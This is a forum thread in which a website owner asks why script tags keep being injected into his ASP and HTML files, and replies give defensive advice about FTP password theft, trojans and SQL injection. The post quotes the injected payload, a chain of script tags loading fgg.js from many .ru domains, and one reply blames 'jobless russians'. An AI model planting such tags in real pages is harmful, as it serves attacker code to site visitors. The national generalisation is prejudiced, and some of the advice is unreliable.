Dear Sir,

 I have a asp website in online. It is working very fine before two weeks. But now some one hacking my website regularly. They insert a <script> tag in at the bottom of my all source files like .asp,.html files. I dont know how they are inserting code in my source file with out knowing my FTP passwords. I am thinking these problem came by hacking. I am very much confusing about that. Please give a solution for this problem. Please Help me. I pasted the script tag by which is inserted in my source file below


<script src=http://www.lkc2.ru/fgg.js></script><script src=http://www.kc43.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.lodse.ru/fgg.js></script><script src=http://www.ecx2.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.sslwer.ru/fgg.js></script><script src=http://www.ecx2.ru/fgg.js></script><script src=http://www.sdkj.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.d5sg.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.sslwer.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.iogp.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.kc43.ru/fgg.js></script>

Donot save passwords in your ftp client. Login everytime if you want to upload any files to the server. If you are using any warez clients i recommend you to uninstall it coz they steal the ftp password even though you change it. Probaly any of the trojans in ur system could steal the password.

Clean up all your site codes and upload them again.

Make the default file of your site to be read only.

You could also change the home page file to be someothername.asp someothername.html. just redirect from the default.asp

Just google IFRAME ATTACK DOS ATTACK to get more information

All these nuisance are caused by jobless russians.

"Raise Shields charge phasers..."

malarcodes

Hi

are you using any database like sql server, ms-access, then this may the problem of sql injection.

i have faced the same problem last month.
if you want to read more about this you can see the complete listing at
http://p2p.wrox.com/topic.asp?TOPIC_ID=73591

in my opinion, if you are using any database, and storing links to your database then it is possible inject code into your database without knowing your ftp account or connection details.

just check your code where proper validation is not done.